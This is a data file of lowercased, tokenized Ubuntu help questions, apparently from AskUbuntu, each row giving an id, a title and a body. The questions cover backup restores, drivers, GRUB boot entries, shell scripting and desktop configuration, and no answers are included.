343642	failed back up restore from deja-dup backup	my ubuntu crashed and i had to do a complete reinstall . i have made a full back onto an external hard drive of everything . deja-dup always verified the backups and i never tested restoring as i trusted that it would work , i trusted the software . when i run the restore i get an error message which reads ; `` command line error : one of the arguments must be an url . examples of url strings are `` scp : //user @ host.net:1234/path '' and `` file : ///user/local '' . see the man page for more information . enter 'duplicity -- help ' for help screen . '' i ran the suggested command but do n't understand it . also i 've copied the files to my desktop and tried to extract but i get an error that the file type 'difftar ' is not supported . any advice on how to successfully restore my files ?
343645	hold mouse button to scroll	i 'm the proud owner of a set of kinesis foot pedals , which by default map to usb mouse buttons 1 to 3 . i 'm trying to use these as `` scroll pedals '' , i.e . pushing and holding the left/right pedal should be equivalent to scrolling up/down on the mouse wheel . remapping the buttons to 4 and 5 is thus insufficient since this will only produce a single scroll event when the button is held . apparently , the notion of repeating mouse buttons is entirely unheard of . my current solution is to use btnx to map the mouse events to cursor up/down key presses , which approximates what i want , but fails in lots of circumstances ( since cursor down often has different behaviour from `` scroll down '' , for which there is apparently no key ) . is there an analogon to keyboard repeat for mouse buttons , or can you think of some other way to get the behaviour i want ?
343647	auto shut down if usage timer exceeds daily limit	i would like to activate a cron job valid for specific users only ( for my kids ) that it will check if the kids use the pc more than e.g . 60 min per day and then poweroff system . this means that if the condition is true , pc shuts down and in case the user reboots then he/she is not able to login again . thank you in advance .
343648	boot up problem : p fifo dma_pusher mem_fault	i have been trying to solve this issue on my own , but no luck so far . what i have tried in order to clear the fault is : blank all hdds back to factory state did a full ram error check ( passed everything , zero errors ) re-created all raid & lvm partitions ( two drives are raid1 , the other 4 are raid5 ) then reinstall ubuntu ( 13.04 server : i386 ) ... but the problem still occurs , even though the installation seemed to go just fine . what i get on screen after a reboot is this : bottom half of screen is vertical stripes ( alternating white & light blue ) top part of screen is expected black with text ... but the only text i get are lines like this : [ 58.865374 ] nouveau e [ pfifo ] [ 0000:05:02.0 ] dma_pusher - ch 0 get 0x20000000 put 0x00002eb8 state 0xc0020000 ( err : mem_fault ) push 0x00000000 the hdd light is still on , and every now & then a new line like the one above appears ( but with different numbers at the start ( before 'nouveau ' ) and again after the 'put ' ... everything else remains the same in each successive line on screen ) can anyone explain to me what i am seeing , and the process of finding out what is causing it & how to fix it ? i have n't been able to find any discussions that go into this in depth , only ones to solve other people 's situations specific to them . their issue seemed to relate to nvidia graphics card , but nothing explained how i can check what is causing this for me , and then how to solve it . test 1 : removed 3 of 4 ram chips gets to login screen ... but error message at login says : computer_name login : mountall : playmouth command failed mountall : disconnected from plymouth will try again with other 3 ram chips each on their own to see if different result update on test 1 i hit ctrl+alt+f1 ( as per suggestions in some similar forum questions ) login prompt resolved after hitting enter successfully logged in ( have not yet tried rebooting yet or adding other ram chips ) df command gives me view of root & other folders all where i would expect them to be so will now do sudo apt-get update & upgrade followed by a reboot to see if that changes things *further update* following apt-get update & upgrade , i have to press every key on the keyboard twice to get it to show at the command line prompt ... and doing an : install -- help ( to get some info about a command option i saw used in another forum suggestion ) this resulted in the output to screen being staggered across the screen from one line to the next , instead of in a nicely formatted column so clearly something ( ? ) is up with the display driver ( ? ) will try reboot now semi solution below ... but part of problem still persists as per the answer below , i did manage to get the install working with 1 ram chip installed ... and , it also worked with any combination of 2 ram chips installed ... but ( unfortunately ) , it went back to delivering the errors & blue/white stripes on screen when i tried all 4 chips . - is there some way to narrow down this next part of the problem via the command line ? should i be checking log-files for something ? if so , which files & check for what ? any help greatly appreciated ... i am stumped on this one yay finally solved 100 % - see update in answer below finally figured out the rest of it , and will add that to my answer following ... hope this helps someone else : - )
343655	problem detecting wifi on asus a74a with ubuntu 13.04	i have successfully installed ubuntu 13.04 as double boot with windows 8 into my new asus x74a . everything works fine , expect the wifi ! although it recognizes the essid ( see below ) , it does not switch it on . note that under windows 8 it works fine . eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=off retry long limit:7 rts thr=2347 b fragment thr : off power management : of any help ! prgenevo @ prgenevo-x75a1 : ~ $ sudo lshw -class network *-network désactivé description : interface réseau sans fil produit : rtl8188ce 802.11b/g/n wifi adapter fabriquant : realtek semiconductor co. , ltd. identifiant matériel : 0 information bus : pci @ 0000:02:00.0 nom logique : wlan0 version : 01 numéro de série : 20:68:9d:98:4d:55 bits : 64 bits horloge : 33mhz fonctionnalités : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rtl8192ce driverversion=3.8.0-19-generic firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11bgn ressources : irq:17 porte/s : e000 ( taille=256 ) mémoire : f7d00000-f7d03fff *-network description : ethernet interface produit : ar8161 gigabit ethernet fabriquant : qualcomm atheros identifiant matériel : 0 information bus : pci @ 0000:03:00.0 nom logique : eth0 version : 10 numéro de série : 08:60:6e:95:8d:9a taille : 100mbit/s capacité : 1gbit/s bits : 64 bits horloge : 33mhz fonctionnalités : pm pciexpress msi msix bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=alx driverversion=1.2.3 duplex=full firmware=n/a ip=192.168.0.18 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s ressources : irq:19 mémoire : f7c00000-f7c3ffff porte/s : d000 ( taille=128 )
343662	how would one produce 8/16 bit music on linux ?	so , i 've been interested in making 16 bit ( retro videogame style ) music on ubuntu for a while now but every time i look it up on google , it 's always showing me how to drop my regular every day music down to 16bits .
343663	ubuntu 13.04 and bluez-5.8 configure : error : systemd system unit directory is required	i am installing bluez 5.8 on ubuntu 13.40 and while running ./configure , i am getting this error message . checking systemd system unit dir ... configure : error : systemd system unit directory is required how do i resolve this ?
343668	is there a tool that will tell me why my hard drive is spinning up ?	i have my os installed on a small ssd and most of my data on a large hdd . my hdd will spin up every fifteen minutes or so even if i am not doing anything . i want to find out who is causing it to spin up so i can either move its stuff back or tell it to stop .
343673	how to install grub bootloader over windows 7 ?	my windows 7 is working on different partition and my ubuntu 12.04 exists in another partition which is unable to boot on startup . i want windows 7 and ubuntu to boot separately .
343675	battery drain and over heating	i recently switched from windows 7 to ubuntu and i have started to see a dramatic decrease in battery life . about 2 hours battery life on ubuntu , as opposed to when i had windows ( about 5 hours ) . what could i do to end this overheating and lengthen battery life ? i have a samsung series 7 chronos i7 2.2ghz 1tb 6gb ram
343676	what 's the most convenient way to share steam apps between different users ?	steam installs apps into a user 's home folder . this means when a user installs an app , a different user has to install the same app again . what 's the most convenient way to share steam apps ? my best idea is to have a one user who will have the main folder with read-write permissions for others and just have other users symlink to it . i 'm not even sure if this will work . is there a cleaner solution or one suggested by valve ?
343677	problem when installing anki : unmet dependencies	i 'm trying to install anki srs http : //ankisrs.net/ on ( freshly-installed ) ubuntu 13.04 , but it is n't going swiftly : the following packages have unmet dependencies : anki : depends : python ( > = 2.7.1-0ubuntu2 ) but 2.7.3-0ubuntu2.2 is to be installed depends : python-qt4 ( > = 4.4 ) but 4.9.1-2ubuntu1 is to be installed depends : python-simplejson ( > = 1.7.3 ) but 2.3.2-1 is to be installed what can i do to resolve this issue ?
343681	how do i access windows partition ?	when i try to go to the windows partition ( /dev/sda4 ) i get an error :
343682	grub rescue even with no hard drive in the pc	i installed ubuntu to give it a try i decided i wanted my windows back and got the typical grub problem ... now i decided to just remove the hdd with it on and install windows to a seperate hdd ... i removed the ubuntu hdd and tried booting with no hdd installed at all ... still get the grub error and i dont see how as there is no storage in the pc at all , anyone know how this is possible ? ... . answers on a post card
343683	how to change user picture of login window in xubuntu 12.04 ?	i am using xubuntu 12.04 . i have been trying to configure user pictures for login window for 2 weeks . i have read a lot of threads ( on this forum too ) and i am sorry for asking a similar question ( except of xubuntu version ) - but still does n't work . i tried to put a picture named .face in my home directory with any combination of sizes ( 96x96 , 96x72 , 64x64 ) and image types ( jpeg , png ) . none of them works . the picture is displayed when i open startmenu/system/'users and groups ' , however not displayed at login . right after installation the mouse icon was displayed for all users , then it was somehow changed to the computer icon for all users . it would be so nice to have pictures to make selection of the user easier for my kids . is it possible at all to have user pictures in 12.04 or is the only possibility to upgrade to 13.04 ( because it was said 13.04 displays the pictures ) ?
343687	how to become administrator user ?	i 'm new to this ubuntu 13.04 so in terminal i allways need to start my xampp as a root so please help me i wan na convert my current account as an administrator ( root ) user .
343692	`` module load '' command does not work	i 'm trying to compile the `` global climate model '' with the following commands : module unload pgi gcc module load gcc/4.6.3 pgi/11.8 but the terminal replies : command not found . what am i doing wrong ? what is the right way to do this ?
343700	how to install drivers for brother printer	just installed ubuntu 12.04lts . my brother dcp-130c usb printer is correctly detected but the drivers for a dcp-1200 are installed by default . i have downloaded what i assume are the correct drivers from brother ( deb format ) but do n't know what to do now . the .deb file is in my downloads folder . i am a newbie to linux/ubuntu so climbing a bit of a learning curve . hope someone can help roy
343702	data recovery - fastest way to recover data from wd passport se 1tb	when trying to open in windows explorer , windows will scan before eventually giving up . the files is only accessible from within ubuntu . there are about 500gb of data that needs to be recovered . navigationg through the folders and files is extremely slow that i suspect this hdd is not going to live long . to make matters worst , the owner was fond of using full sentences for folder name . ( e.g . bali vacation pictures with mark , jenny and susan , etc ) and each of these folder then have subfolders within subfoldersa owith similarly long folder names & file names . i 've tried rsync and cp both works but seems to keep getting error input/output error after a couple of hours . basically after awhile the ext hdd will `` disappear '' and i have to restart ubuntu and repeat the whole process . any suggestions / ideas / recommendation / advise is much appreciatede . thanks in advance .
343703	nexus 4 can not pass the x screen after uninstalling ubuntu touch	i followed official ubuntu touch instructions for installing/uninstalling ubuntu . installation went without any problems , but after returning back android , the device is stuck on the `` x '' animation and can not proceed . i tried the following : going into recovering mode flashing the device to stock version of android ( v4.2 ) flashing the device to previous installed android ( v4.3 ) the flash-all.sh command is executed successfully every time , but boot gets stuck at `` x '' animation no matter what i do . what can i do to fix this issue ? any ideas ? thanks !
343706	text editor like adobe dreamweaver for ubuntu 13.04	i 'm new to this ubuntu 13.04 , and i 'm a web designer and developer i used dreamweaver when i am using windows so can any one help me which of the text editor is best to use which helps me in designing ( html , css , jquery , javascript ) and developing ( php , mysql ) and which is same like adobe dreamweaver and can you also help me how to install it in my ubuntu 13.04 64bit .
343712	everytime i enter to ubuntu i do n't have bars , i dont have browser , etc	every time i enter on ubuntu , this happens : then when i put my mouse in the corner it would give me a black image i have my unity enabled but it does n't give me a little box next to it to enable it ( but i think i have it enabled because when i click on it in the left it says to enable it and i have it enabled ) can someone help me with this ?
343713	is there a way to recover the data of unaccessible lines on the terminal ?	i am running an algorithm that regularly prints data on the terminal . unfortunately the terminal only shows a limited number of lines , the others are no longer accessible . are they deleted or can i recover the data ?
343715	permanently removing read only option	i have ubuntu 13.04 and kernel 3.11 . when i press e key at grub bootmenu i see the read only ro option at root partition and when i start system with that option i have low resolution and other problems . otherwise removing ro option before starting the system makes everything work fine . i would like to know how to permanently remove ro option . i have already checked /etc/default/grub but there is no ro , here is my grub : grub_timeout= '' 10 '' grub_distributor= '' `lsb_release -i -s 2 > /dev/null || echo debian` '' grub_hidden_timeout_quiet= '' true '' grub_default=saved grub_gfxmode=1920x1080 grub_savedefault=false grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' how can i do that ? what file do we see when using e key at grub bootmenu ? if i know that maybe i 'll be able to edit it . thanks
343719	how to get a `` refresh '' right click action ?	i 'm new to ubuntu 13.04 . i want a 'refresh ' option , like in windows when you right click on desktop . can anyone help me to get that option in ubuntu ?
343722	raw copy external drives	i have one almost full external hdd with 1tb , and the other empty with 2tb . what is the fastest way to copy the content from the smaller to the bigger ? is there a way to do some kind of raw copy without skipping the blocks/sectors , just continuous copying ?
343727	filenames with spaces breaking for loop , find command	i have a script which searches all files in multiple subfolders and archives to tar . my script is for file in `find . -type f -name '* . *'` do if [ [ ! -f archive.tar ] ] ; then tar -cpf archive.tar $ file else tar -upf archive.tar $ file fi done the find command gives me the following output find . -type f -iname '* . *' ./f1/f1-2013-03-19 160413.csv ./f1/f1-2013-03-19 164411.csv ./f1-failed/f2/f1-2013-03-19 154412.csv ./f1-failed/f3/f1-2011-10-02 212910.csv ./f1-archive/f1-2012-06-30 004408.csv ./f1-archive/f1-2012-05-08 190408.csv but the file variable only stores first part of the path ./f1/f1-2013-03-19 and then the next part 160413.csv . i tried using read with a while loop , while read `find . -type f -iname '* . *'` ; do ls $ reply ; done but i get the following error bash : read : `./f1/f1-2013-03-19 ' : not a valid identifier can anyone suggest an alternative way ? update as suggested in the answers below i updated the scripts # ! /bin/bash input_dir=/usr/local/f1 cd $ input_dir for file in `` $ ( find . -type f -iname '* . * ' ) '' do archive=archive.tar if [ -f $ archive ] ; then tar uvf $ archive `` $ file '' else tar -cvf $ archive `` $ file '' fi done the output that i get is ./test.sh tar : ./f1/f1-2013-03-19 160413.csv\n./f1/f1-2013-03-19 164411.csv\n./f1/f1-2013-03-19 153413.csv\n./f1/f1-2013-03-19 154412.csv\n./f1/f1-2012-09-10 113409.csv\n./f1/f1-2013-03-19 152411.csv\n./.tar\n./f1-failed/f3/f1-2013-03-19 154412.csv\n./f1-failed/f3/f1-2013-03-19 170411.csv\n./f1-failed/f3/f1-2012-09-10 113409.csv\n./f1-failed/f2/f1-2011-10-03 113911.csv\n./f1-failed/f2/f1-2011-10-02 165908.csv\n./f1-failed/f2/f1-2011-10-02 212910.csv\n./f1-archive/f1-2012-06-30 004408.csv\n./f1-archive/f1-2011-08-17 133905.csv\n./f1-archive/f1-2012-10-21 154410.csv\n./f1-archive/f1-2012-05-08 190408.csv : can not stat : no such file or directory tar : exiting with failure status due to previous errors
343733	how to shutdown computer when users are logged on ?	i am trying to shut down my ubuntu laptop , but some other users have left their accounts logged-in . ( all users are local . ) normal shutdown is blocked because of this . i can do a hard shutdown with the power switch , but is there a way to force shutdown from within ubuntu ?
343746	disable and delete goa-daemon	how to disable and delete goa-daemon . i 'm not using online accounts and this daemon only consumes my memory and cpu .
343751	ca n't work with ubuntu live cd	trying to clone a hard drive using dd ( that can not be mounted while doing a dd ) i use the live cd to boot from and use the `` try ubuntu '' option . however , i get the error `` the system is running in low-graphics mode '' and no matter what i choose after i end up in a black screen and no way out . i have also tried switching to command line mode i.e . ctrl-alt-f [ 1 ... 6 ] but i get no command line . all i need is a command line and the two disks unmounted . murphy laws at their best .
343752	any equivalent for matlab/simulink/sim power system toolbox	is there any software/package which is equivalent to matlab/simulink/sim power system toolbox ?
343756	keep the titlebar of nautilus in gnome shell when maximized	( gnome shell , 13.04 , upgraded , gnome 3.8 ) except for nautilus all applications have a title bar when maximized . i want the title bar with close button , even when nautilus is maximized . this is exactly the opposite of this question .
343762	windows in virtualbox show error ex80070057 when copying files from a network share	i encountered this problem after installing 13.04 . windows virtual machine was originally installed on an 10.04 system . i could not open any files on network shares ( shared from the host machine ) , and when i tried to copy the files to the windows guest system , i got the error ex80070057 : the parameter is incorrect . question was : how to solve the problem ?
343767	how to install ubuntu 12.04 without internet connection	i do n't have an internet connection on my laptop , so please help me
343768	why is it not showing any partitions ?	i 'm having a problem installing ubuntu , and kali as well . i downloaded the iso from the official site & tried installing using usb . i also tried desktop installation , but the problem is same . it shows a single drive i.e . my total hard disk and if i select it , it asks me to create a new partition & shows total space as free . it 's with all ubuntu i downloaded , 11.10 server , 12.10 and 13.04 . i also tried to install backtrack 's new version kali linux but again i got the same problem . i hope i meet thier system requirements . here 's my system details for your ease : os : windows 7 ultimate processor : intel p4 2.80 ghz ram : 3gb hard disk : 320gb no of local drives : 4 ( 1 primary , 3 logical ) free space : 195gb ( about ) motherboard : g31 cache : 1mb help me , please .
343769	are there any packages that do all the recommended configuration settings for a secured server environment ?	i came across questions & articles like these : 1 . ) what can be done to secure ubuntu server ? , 2 . ) how to prevent your website from getting hacked . which speak of many configuration settings for securing an ubuntu server . i just want to know if there are any packages which handle setting all these configuration at all different places & i could probably just maintain a central configuration spot . are there any such tools ?
343770	gdb symbol lookup error	i 'm trying to use gdb on ubuntu 12.04 , but every time the program crashes with the following error gdb : symbol lookup error : gdb : undefined symbol : pyunicodeucs4_fromencodedobject looks something python related , but i do not know what to do ...
343775	ubuntu 12.04 installation time problem	i have had a problem while installing ubuntu 12.04 . i set the installation size as 10gb and its taking more than 4hrs , then my broadband goes down . my system ram is 2gb and its 32-bit . please can you help me ?
343779	in guake , why only the first tab is transparent ?	in guake , if i press `` f12 '' , i get the semi-transparent hud-like terminal as expected . but if i then press `` ctrl-shift-t '' to open another tab , the new tab will not be transparent any more . is this a bug or a feature ?
343780	smart support is available but goes back to disabled on restart	i 've smartmontools installed on my ubuntu server . hdd is smart capable : sudo smartctl -i /dev/sda === start of information section === model family : western digital scorpio blue serial ata ( adv . format ) device model : wdc wd10tpvt-11u4rt1 serial number : wd-wxc1a80p0314 lu wwn device id : 5 0014ee 20507d2dc firmware version : 01.01a01 user capacity : 1,000,204,886,016 bytes [ 1.00 tb ] sector sizes : 512 bytes logical , 4096 bytes physical device is : in smartctl database [ for details use : -p show ] ata version is : 8 ata standard is : exact ata specification draft version not indicated local time is : tue sep 10 16:05:58 2013 get smart support is : available - device has smart capability . smart support is : disabled i enable it by running : sudo smartctl -s on /dev/sda if i run command smartctl -i again , i see smart support is : enabled . but this goes back to disabled on restart .
343781	bootloader screen hd/os selection	installed ubuntu 12.04 . computer has 3 hds partitioned and multiple instances of windows xp . hd configuration as follows : sda vista|ubuntu ; sdb windows xp ( 1 ) ; sdc windows xp ( 2 ) | windows xp ( 3 ) boot screen looks as follows : ubuntu , with linux 3.2.0-52-generic-pae ubuntu , with linux 3.2.0-52-generic-pae ( recovery mode ) previous linux versions memory test ( memtest86+ ) memory test ( memtest86+ , serial console 115200 ) windows vista ( loader ) ( on /dev/sda3 ) microsoft windows xp professional ( on /dev/sdb1 ) microsoft windows xp professional ( on /dev/sdc1 ) microsoft windows xp professional ( on /dev/sdc2 ) if windows xp ( ! ) is selected , the computer boot correctly on the instance of xp on hd sdb . however if windows xp ( 2 ) or ( 3 ) is selected , the computer still boots on the instance of xp on hd sdb vice sdc . looking at file /boot/grub/grub.cfg for sdb , and sdc : menuentry `` microsoft windows xp professional ( on /dev/sdb1 ) '' -- class windows -- class os { insmod part_msdos insmod ntfs set root= ' ( hd1 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root f6ecd6c9ecd68373 drivemap -s ( hd0 ) $ { root } chainloader +1 } menuentry `` microsoft windows xp professional ( on /dev/sdc1 ) '' -- class windows -- class os { insmod part_msdos insmod ntfs set root= ' ( hd2 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root f6ecd6c9ecd68373 drivemap -s ( hd0 ) $ { root } chainloader +1 } menuentry `` microsoft windows xp professional ( on /dev/sdc2 ) '' -- class windows -- class os { insmod part_msdos insmod ntfs set root= ' ( hd2 , msdos2 ) ' search -- no-floppy -- fs-uuid -- set=root f6ecd6c9ecd68373 drivemap -s ( hd0 ) $ { root } chainloader +1 it appears that the 3 partitions/instances of windows xp have the same uuid which may be the problem . how can this be fixed ? if the uuid can be change , will this change the ability the selected the partition to be booted using the computer 's bios boot menu ( f2 ) or ( f12 ) ?
343788	skype nofitication icon on gnome session fallback ( 12.04 )	i have the ubuntu 12.04.2 installed on my machine . i also have skype 4.2.0.11 installed . skype icon wo n't appear on the notification panel ( upper right ) . i ca n't see a way to get it working . anyone has a clue ?
343794	how to install broadcom driver for dell inspiron 1440 in ubuntu 12.04	i 'm just install ubuntu 12.04 precise pangolin , but after installing i still need to download broadcom wireless driver . i do n't have a wired connection , can anyone please help me to install it offline ? please help .
343797	please help me with ubuntu server 12.04.2	so recently i installed a web server using apache2 using directions from server world . after i finished with it and restarted apache2 service , i got this error : apache2 : syntax error on line 211 of /etc/apache2/apache2.conf : syntax error on line 5 of /etc/apache2/mods-enabled/dir.conf : < ifmodule > directive requires additional arguments action 'configtest ' failed the apache error log may have more information ... fail ! please help me , it 's my assignment for my school .
343798	unable to install darkice in ubuntu 12.04 x64	i 'm trying to install darkice with `` apt-get '' by looking at this tutorial here.. but it says unable to locate the package . and i 've downloaded a .tar from their web.. extracted the package , cd into it & when i try to use ./configure , it runs and stops with some errors . i 've actually mentioned it in their support page but no one seems to reply to it yet . please advise me or just simply show me a guide to install icecast , ezstream and darkice to an ubuntu distro
343801	installing 12.10	i have downloaded ubuntu 12.10 on a usb stick and followed all instructions as given . but when i try to install it on hardrive or run it . it says that i have the wrong linux kernel for this cpu . it 's a intel celeron m. what am i doing wrong plz help
343802	how to make partitions using gparted ?	resize move options are disabled , so how are you make partitions using gparted ?
343811	access ubuntu remotely from android ?	i have installed ubuntu 13.04 and using android 4.1 version based device.i 'd like to access my ubuntu from my android device through remote access . i have already tried several apps from store and i am happy with them . but i want to remote access through local network , not through internet . what ever the clients i have already tried those are providing through internet not from local network . i have connected my mobile to my system wi-fi network . bottom-line : how to access ubuntu from android through local network wi-fi based ?
343812	how to use a web page that requires flash player 11.6 ?	i want to visit a web page that requires flash player 11.6 , but i aslo visit the page of download of adobe flash player , and they tell us . note : flash player 11.2 is the last supported flash player version for linux . adobe will continue to provide security updates . does anybody know a way to visit a website with this restrictions ?
343816	tcl/tk gui resizing problem in ubuntu 12.10	when i open my tcl/tk gui in ubuntu 12.10 , the gui got cut off from right side . though same code seems to work fine in ubuntu 11.04 . also , when i move to gnome or gnome classic using gnome shell the gui seems to work fine in 12.10 . what is this strange problem ? how can i run my gui in default mode without this weird behavior ? thanks in advance .
343817	btguard socks5 libtorrent qbittorrent deluge trackers not updating stalled downloads	i have been trying to use btguard with ubuntu/xubuntu 13.04 and 13.10 beta with deluge , qbittorrent . however , the trackers never seem to update . on the same computer with ubuntu/xubuntu 12.04 there is no problems . when researching this problem , several other people are having this issue and some think the problem is with libtorrent and/or socks5 and/or udp . does anyone know of a work-around for this problem ? how can i update qbittorrent and libtorrent to the latest versions on 13.04/13.10 ? has anyone gotten socks5 w/btguard to work on 13.04/13.10 ? as an added note , qbittorrent was working intermittently with lots of stalls on 13.04 until a recent update . i 'm not sure what changed . the latest version of deluge w/btguard does not seem to work on 13.10 , even though it appears to use more recent versions of deluge and libtorrent . i have not tested any of this on 12.10 .
343818	how to check kernel image size ?	kindly tell me how to find size of the kernel image of ubuntu that i installed on the virtual box . regards
343819	how to change wallpaper-preferences from nemo to nautilus	i have installed nemo instead of nautilus , and almost everything works fine , except one thing : if i want to change the wallpaper and i use right-click - change wallpaper , a cinnamon preferences window opens . if i change the wallpaper here , nothing happens ... i 'd prefer the `` old '' wallpaper window from gnome/unity , which changes the wallpapers accordingly . can i change that `` action '' ? thanks
343820	replace 32bit with 64bit advantage	my first post . successfully migrated from win 7 to ubuntu 12.04.1 on my samsung netbook . working smoothly . but i had installed 32 bit version . is there any advantage of going in for 64 bit ? what are the risks . ram prasad
343821	screen resolution	here goes : i have been using ubuntu with ignorant bliss for years , just following update instructions ... i have ubuntu 12.04 and an hp pavilion bw22 monitor that should display at 1920 x 1080 . it does not and there is no option in my preferences . *-display unclaimed description : vga compatible controller product : nv34 [ geforce fx 5200 ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:02:00.0 version : a1 width : 32 bits clock : 66mhz capabilities : vga_controller bus_master cap_list configuration : latency=32 maxlatency=1 mingnt=5 i visited various pages and tried all of the simpler suggestions ( addmode/newmode etc ) i could find , all seemed to get stopped eventually by `` failed to get size of gamma for output default '' if i switch to my windows partition the resolution is available . i did not try the xorg.config suggestions because a. the most i can do in the terminal to date is restart my internet connection b. i did n't find instruction on what to do if my computer wo n't start up afterward and c. i found random files in my filesystem called xorg and had no idea what i was looking at . if someone has patience to get me through this literally step by step ?
343824	fans acting up after installation on acer aspire v3-571g	i just installed ubuntu 13.04 and it seems my fan is working harder and kind of revs up every thirty second or so . it came with windows 8 pre-installed and when i ran windows it did n't get nearly as hot . my laptop is an acer aspire v3-571g
343827	cron to send email if file does n't exist	i have a cron job that executes a shell script like following 00 01 * * * sh /backup/script.sh now i need to add a functionality in cron so that if this script does n't exist then it generates an alert to me through email using sendmail utility . something like 00 01 * * * find script and execute script or if find no result then email .
343844	how to manage tray icons in gnome 3 ?	the short : in gnome 3 , is there a way to make specific legacy tray icons either not appear at all or be hidden ? the longer : i use two programs that put icons in the legacy system tray : spotify and qbittorrent . i use the 'topicons ' extension to make legacy icons appear on the gnome shell panel because i want qbittorrent 's icon to appear there . however , i do not want spotify 's icon to appear in the panel ( unfortunately spotify does not offer an option to disable its tray icon . is there a way to selectively control which icons can appear in the panel and/or tray ? i am using ubuntu 13.04 and gnome 3.10 ( or whatever the latest iteration is ) . edit : gnome is not 3.10 , it is the latest that ubuntu-gnome ships , a combination of 3.6 and 3.8 .
343847	mkfs.ntfs is not found , through the ntfs-3g package is installed	i 'm trying to format a usb stick to ntfs file system with the mkfs.ntfs command and i get this in terminal : horbuli @ boss : ~ $ sudo apt-get install ntfs-3g reading package lists ... done building dependency tree reading state information ... done ntfs-3g is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . horbuli @ boss : ~ $ mkfs.ntfs /dev/sdb1 the program 'mkfs.ntfs ' is currently not installed . you can install it by typing : sudo apt-get install ntfs-3g horbuli @ boss : ~ $ what is the problem ?
343848	distorted graphics when using gnome on ubuntu 12.10	i installed gnome desktop environment on ubuntu 12.10 and when i try to use it my screen looks like this . i still can log with unity . i used these commands : sudo apt-get install gnome-session-fallback sudo apt-get install gnome do i need to install something else ? by the way , i 'm currently using `` ati/amd proprietary fglrx graphics driver ( post-release updates ) '' video card : radeon 6770 help please ? thanks !
343851	live persistant install wo n't boot	i 've installed ubuntu on a flash drive via unetbootin and it worked flawlessly up until today . a few moments after i booted it said `` system problem detected '' and i reported it . i disregarded this since it happens nearly every time i boot but this time the screen glitched out and i forced it down to reboot . now the problem . i get the unetbootin menu and then the splash screen comes up and then a black screen . booting without splash shows two errors that i can see , mostly a series of input/output errors related to casper , errors in the ext2-fs , and init reporting 'caught abort , core dumped ' i 'm not too worried about saving the installation , but i do have notes from a class that are very important to me and i 'd like to save those if possible . hopefully i 've given enough information to help ...
343853	heating problem in ubuntu 12.04	i am using ubuntu 12.04 on my intel core-i7 machine and it heats up terribly . on the other hand , windows 7 on the same machine works pretty fine . are there any fixes or suggestions on how i can overcome this problem ?
343855	how to install gnome 3.10 in ubuntu 13.10 ?	i am using ubuntu 13.10 . is it possible to install gnome 3.10 in it ?
343858	13.04 : opening ubuntu one gui	i am having trouble syncing files in ubuntu one . i was going to connect and disconnect using the interface in previous versions but i can no longer access this . i have a cloud in the top right of my monitor and this has `` open ubuntu one '' as the first option but nothing happens when i click that .
343859	what file managers are avilable for ubuntu ?	please , can someone advise me which file managers that are available to install and use in ubuntu ? please include only one file manager per answer , with the following information : caracteristics and/or features main differences with the installed by default in ubuntu ( nautilus , dolphin , pacman , etc . ) screenshot how to install and configure as default file manager how to remove and purge configurations restoring the original configuration
343864	linux does not detect the micro-sd cards	i have a microsd card in my android and i would like to plug it in into my computer to change the music and collect photos . however , i am not able to do this , the os does not seem to even notice that i have a microsd card plugged ( not even when i plug-in my huawei android with it as well ) . i have a dual boot of windows and linux , with 2 auto-mounted partitions , but i do not think this is the problem . could it be a driver problem ? i am not sure ... help if possible please . i am using ubuntu 13.04 with gnome installed . i also suffer from ( yet another severe problem ) with unity , thus the reason why i changed .
343866	up to date , but says i need an update ?	i 'm using xubuntu 13.04 . there 's a yellow update icon in my panel and when i click it , there is an unclickable grayed out options that says `` there is 1 update available '' . when i click on the option to show updates , it says my computer is up to date . i 've tried sudo apt-get update , but it does not remove the message . what can i do to get this updated or at least remove it ? i do not know what the update is because there is nothing telling me what it wants to update .
343867	how to sort the indicators	i 'm on ubuntu 12.04 and i was wondering if is there any way to sort the indicators like this ( image ) : the bottom bar is the default one and the upper bar is how i 'd like to sort 'em . dbus-send -- type=method_call -- print-reply -- dest=com.canonical.indicator.application /com/canonical/indicator/application/service com.canonical.indicator.application.service.getapplications | grep `` object path '' returns this : object path `` /org/ayatana/notificationitem/lang_indicator/menu '' object path `` /org/ayatana/notificationitem/my_weather_indicator/menu '' object path `` /org/ayatana/notificationitem/transmission/menu '' object path `` /org/ayatana/notificationitem/bluetooth_manager/menu '' object path `` /org/ayatana/notificationitem/indicator_sysmonitor/menu '' object path `` /org/ayatana/notificationitem/nm_applet/menu '' how i have to edit the `` ~/.local/share/indicators/application/ordering-override.keyfile '' to do this ?
343869	stackoverflow code segment font changed , possibly after changing system fonts	i am on ubuntu 12.10 ( using firefox , but the same font appears on chrome too ) and i 've been changing the theme and fonts of the system using ubuntu tweak tool . the problem is that the code segments at the questions/replies now use the monaco font while the code segment at the comments use the classic font used here ( i think it 's ubuntu mono ) . here is how it looks : how can i make all the code segments use the classic ubuntu mono font ?
343875	can not run ubuntu after installation using wubi	i 'm fairly new to ubuntu . i have installed ubuntu using the wubi installer and it seemed as though everything worked fine , but when i get to the boot screen and i select ubuntu , it gives me a black screen saying it could n't start windows because of hardware or software change . i then just hit enter to continue , and then can still select and run windows 7 fine . how do i run ubuntu ? any idea what i can do to cure this would be appreciated .
343876	upgrade packages from usb	if i download the next version say 13.10 and create an usb installer . is it possible to upgrade an existing version say 13.04 to 13.10 without erasing the old version ? edit : as i can see from the below answers , you are suggesting that this is a duplicate of this how do i upgrade from ubuntu 12.04 to ubuntu 13.04 with an .iso image ? i ca n't fully agree with that . i have already tried exact same steps , but exactly when i have to select the installation type , that option to upgrade from 12.10 to 13.04 was disabled and only available options were to `` erase everything and install '' and `` do manage partitions manually '' . now , i ca n't even take that dialog screenshot , as i erased my previous version completely already and as a result now i have to prepare my dev environment again .
